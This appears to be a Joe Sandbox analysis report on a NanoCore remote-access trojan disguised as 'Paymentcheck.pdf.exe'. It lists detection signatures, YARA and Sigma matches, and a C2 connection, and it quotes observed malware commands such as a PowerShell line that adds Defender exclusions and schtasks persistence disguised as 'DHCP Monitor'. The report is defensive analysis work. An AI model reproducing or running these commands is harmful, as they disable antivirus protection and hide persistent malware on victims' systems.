Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Paymentcheck.pdf.exe

Overview

General Information

Sample Name:Paymentcheck.pdf.exe
Analysis ID:458302
MD5:b7e3c3c9735d6ba37616d791171fe2db
SHA1:8763c22ed1151ec2c5b584415154ec7e3c50d964
SHA256:91b97fb3f4695fd57c723b537c5b811195f9f99b0ac6033835f75444c36712b9
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Creates an undocumented autostart registry key
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Paymentcheck.pdf.exe (PID: 3736 cmdline: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' MD5: B7E3C3C9735D6BA37616D791171FE2DB)
    • wscript.exe (PID: 6464 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • powershell.exe (PID: 6860 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 6732 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • schtasks.exe (PID: 1748 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6352 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegAsm.exe (PID: 1476 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 5556 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 6448 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x4bbb:$x1: NanoCore.ClientPluginHost
  • 0x4be5:$x2: IClientNetworkHost
0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x4bbb:$x2: NanoCore.ClientPluginHost
  • 0x6a6b:$s4: PipeCreated
0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x5b0b:$x1: NanoCore.ClientPluginHost
  • 0x5b44:$x2: IClientNetworkHost
0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x5b0b:$x2: NanoCore.ClientPluginHost
  • 0x5c0f:$s4: PipeCreated
  • 0x5b25:$s5: IClientLoggingHost
00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x47acc5:$x1: NanoCore.ClientPluginHost
  • 0x47ad02:$x2: IClientNetworkHost
  • 0x47e835:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Click to see the 48 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
13.2.RegAsm.exe.69a0000.33.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost
13.2.RegAsm.exe.69a0000.33.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x350b:$x2: NanoCore.ClientPluginHost
  • 0x52b6:$s4: PipeCreated
  • 0x34f8:$s5: IClientLoggingHost
13.2.RegAsm.exe.69b0000.36.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1f1db:$x1: NanoCore.ClientPluginHost
  • 0x1f1f5:$x2: IClientNetworkHost
13.2.RegAsm.exe.69b0000.36.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x1f1db:$x2: NanoCore.ClientPluginHost
  • 0x22518:$s4: PipeCreated
  • 0x1f1c8:$s5: IClientLoggingHost
13.2.RegAsm.exe.69a0000.33.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x170b:$x1: NanoCore.ClientPluginHost
  • 0x1725:$x2: IClientNetworkHost
Click to see the 123 entries

Sigma Overview

AV Detection:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

System Summary:

barindex
Sigma detected: Suspicious Process Start Without DLLShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732
Sigma detected: Suspicious Script Execution From Temp FolderShow sources
Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , ProcessId: 6464
Sigma detected: WScript or CScript DropperShow sources
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , ProcessId: 6464
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe', CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6464, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe', ProcessId: 6860
Sigma detected: Possible Applocker BypassShow sources
Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732

Stealing of Sensitive Information:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exeReversingLabs: Detection: 32%
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: Paymentcheck.pdf.exeJoe Sandbox ML: detected
Source: 13.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
Source: 13.2.RegAsm.exe.5210000.21.unpackAvira: Label: TR/NanoCore.fadte
Source: Paymentcheck.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Paymentcheck.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegAsm.pdb source: RegAsm.exe, dhcpmon.exe, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000D.00000000.820068225.00000000004A2000.00000002.00020000.sdmp, RegAsm.exe, 00000012.00000000.835793431.0000000000992000.00000002.00020000.sdmp, dhcpmon.exe, 00000016.00000002.844182498.0000000000E62000.00000002.00020000.sdmp, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49771 -> 217.138.212.57:2018
Source: global trafficTCP traffic: 192.168.2.4:49771 -> 217.138.212.57:2018
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: powershell.exe, 0000000E.00000002.930072177.0000000002E25000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpString found in binary or memory: http://google.com
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Paymentcheck.pdf.exe, 00000000.00000002.821957126.0000000002A21000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.931755679.00000000048B4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comV
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comgrita
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comttva
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: RegAsm.exe, 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
